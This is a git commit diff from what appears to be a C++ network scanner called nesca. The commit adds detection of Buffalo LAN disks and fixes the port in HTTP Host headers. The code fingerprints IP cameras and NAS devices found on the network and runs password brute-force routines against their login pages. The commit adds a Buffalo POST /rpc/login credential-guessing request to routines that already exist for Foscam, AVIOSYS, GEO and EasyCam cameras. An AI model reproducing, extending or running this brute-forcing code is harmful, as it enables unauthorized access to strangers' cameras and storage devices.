Added Buffalo Lan Disk detection

This commit is contained in:
cora32 2014-11-02 12:53:50 +03:00
parent 9760c19c3e
commit 6ad93f6ca2
3 changed files with 108 additions and 13 deletions

View File

@ -381,6 +381,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(hRqst, path);
strcat(hRqst, " HTTP/1.1\r\nHost: ");
strcat(hRqst, ip);
if(port != 80){
strcat(hRqst, ":");
char tbuff[16] = {0};
strcat(hRqst, itoa(port, tbuff, 10));
};
if(cookieLen != 0)
{
strcat(hRqst, "\r\nCookie: ");
@ -577,6 +582,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@ -614,6 +624,11 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcat(request, path);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
if(cookieLen != 0)
{
strcat(request, "\r\nCookie: ");
@ -1934,8 +1949,7 @@ lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionV
strcat(request, "\r\nCookie: ");
strcat(request, cookie);
};
strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n");
strcat(request, "Content-length: ");
strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: ");
strcat(request, itoa(strlen(argData), b, 10));
strcat(request, "\r\n\r\n");
@ -2324,6 +2338,10 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
{
negVector.push_back("Password Error");
}
else if(strcmp(SPEC, "BUFFALO") == 0)
{
negVector.push_back("403 Forbidden");
}
else
{
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
@ -2358,7 +2376,12 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "GEO") == 0)
@ -2369,6 +2392,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "EasyCam") == 0)
@ -2383,6 +2411,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "Foscam") == 0)
@ -2397,6 +2430,11 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "AVIOSYS") == 0)
@ -2407,7 +2445,38 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
}
else if(strcmp(SPEC, "BUFFALO") == 0)
{
strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
strcat(request, itoa(port, tbuff, 10));
};
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
int loginLength = strlen(login);
int passLength = strlen(pass);
int sz = loginLength + passLength + strlen("user=&password=");
char *passString = new char[sz + 1];
ZeroMemory(passString, sizeof(passString));
strcpy(passString, "user=");
strcat(passString, login);
strcat(passString, "&password=");
strcat(passString, pass);
strcat(request, "\r\nContent-Length: ");
char tempBuff[16] = {0};
strcat(request, itoa(sz, tempBuff, 10));
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
};
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
@ -2534,10 +2603,12 @@ int Connector::_ConnectToPort(char *ip, const char *portC, char *hl)
int strFlag = 0;
strcpy(mes, buff1);
strcat(mes, ip);
strcat(mes, ":");
strcat(mes, portC);
strcat(mes, buff2);
int port = atoi(portC);
if(port != 80){
strcat(mes, ":");
strcat(mes, portC);
};
strcat(mes, buff2);
int cRes;
if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR);

View File

@ -181,7 +181,7 @@ int Lexems::globalSearchNeg(const char *buffcpy, char *ip, int port)
{
if(gNegDebugMode)
{
stt->doEmitionDebugFoundData("[<a href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\"><font color=\"#0084ff\">" + QString(ip) + ":" + QString::number(port) + "</font></a>" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
stt->doEmitionDebugFoundData("[<a href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\"><font color=\"#0084ff\">" + QString(ip) + ":" + QString::number(port) + "</font></a>" + "] Negative hit: \"" + QString::fromLocal8Bit(negWord).toHtmlEscaped() + "\"");
if(strlen(negWord) < 2)
{
stt->doEmitionDebugFoundData(" Len:" + QString::number(strlen(negWord)));
@ -290,6 +290,7 @@ int _mainFinderFirst(char *buffcpy, int f, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "camera web server") != NULL || strstr(buffcpy, "webcamxp 5") != NULL
|| strstr(buffcpy, "ip box camera") != NULL || strstr(buffcpy, "snaff") != NULL
@ -358,6 +359,8 @@ int _mainFinderSecond(char *buffcpy, int port, char *ip)
&& strstr(buffcpy, "g_ologin.dologin()") != NULL
) return 44; //hikvision cam 2
if(strstr(buffcpy, "panasonic") != NULL && strstr(buffcpy, "/config/index.cgi") != NULL) return 45; //Panasonic Cam BB-HG???
if(strstr(buffcpy, "/ui/") != NULL && strstr(buffcpy, "sencha-touch") != NULL) return 46; //BUFFALO disk
if(strstr(buffcpy, "hikvision-webs") != NULL || (strstr(buffcpy, "hikvision digital") != NULL && strstr(buffcpy, "dvrdvs-webs") != NULL)
|| (strstr(buffcpy, "lapassword") != NULL && strstr(buffcpy, "lausername") != NULL && strstr(buffcpy, "dologin()") != NULL)) return 34; //hikvision cam
@ -1708,7 +1711,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 38) //Foscam
{
_specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Basic Authorization", cp, recd, "Foscam");
_specWEBIPCAMBrute(ip, p, hl, "[Foscam] IP Camera", flag, "[Foscam] IP Camera", "Web Authorization", cp, recd, "Foscam");
}
else if(flag == 39) //EagleEye
{
@ -1720,7 +1723,7 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
}
else if(flag == 41) //AVIOSYS-camera
{
_specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Basic Authorization", cp, recd, "AVIOSYS");
_specWEBIPCAMBrute(ip, p, hl, "[AVIOSYS] IP Camera", flag, "[AVIOSYS] IP Camera", "Web Authorization", cp, recd, "AVIOSYS");
}
else if(flag == 42) //NW_camera
{
@ -1738,6 +1741,10 @@ int Lexems::_filler(int p, char* buffcpy, char* ip, int recd, Lexems *lx, char *
{
_specBrute(ps.cookie, ip, p, hl, "[Panasonic] IP Camera", flag, "/config/index.cgi", "[Panasonic] IP Camera", "Basic Authorization", cp, recd, "");
}
else if(flag == 46) //Buffalo disk
{
_specWEBIPCAMBrute(ip, p, hl, "[Buffalo] Lan Disk", flag, "[Buffalo] Lan Disk", "Web Authorization", cp, recd, "BUFFALO");
}
else if(flag == 20) //AXIS Camera
{
_specBrute(ps.cookie, ip, p, hl, "AXIS Camera", flag, "/axis-cgi/com/ptz.cgi?", "AXIS Camera", "Basic Authorization", cp, recd, "");
@ -1901,6 +1908,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
if(tempPort != 80){
strcat(mes, ":");
char tbuff[16] = {0};
strcat(mes, itoa(tempPort, tbuff, 10));
}
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@ -2028,9 +2040,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, tempIP);
strcat(mes, ":");
char tbuff[16] = {0};
strcat(mes, itoa(tempPort, tbuff, 10));
if(tempPort != 80){
strcat(mes, ":");
char tbuff[16] = {0};
strcat(mes, itoa(tempPort, tbuff, 10));
}
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@ -2129,6 +2143,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
if(tempPort != 80){
strcat(mes, ":");
char tbuff[16] = {0};
strcat(mes, itoa(tempPort, tbuff, 10));
}
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);
@ -2217,6 +2236,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P
strcat(mes, tempPath);
strcat(mes, rbuff2);
strcat(mes, ip);
if(tempPort != 80){
strcat(mes, ":");
char tbuff[16] = {0};
strcat(mes, itoa(tempPort, tbuff, 10));
}
if(strlen(cookie) != 0)
{
strcat(mes, rbuff3);

View File

@ -2194,7 +2194,7 @@ void nesca_3::slotOutData(QString ip, QString str)
str.replace("Accept-Encoding:", "<font color=\"GoldenRod\">Accept-Encoding:</font>");
str.replace("User-Agent:", "<font color=\"GoldenRod\">User-Agent:</font>");
str.replace("Connection:", "<font color=\"GoldenRod\">Connection:</font>");
str.replace("Content-length:", "<font color=\"GoldenRod\">Content-length:</font>");
str.replace("Content-Length:", "<font color=\"GoldenRod\">Content-Length:</font>");
str.replace("Authorization:", "<font color=\"GoldenRod\">Authorization:</font>");
_rOutProt.indexIn(str);
prot = _rOutProt.cap(0);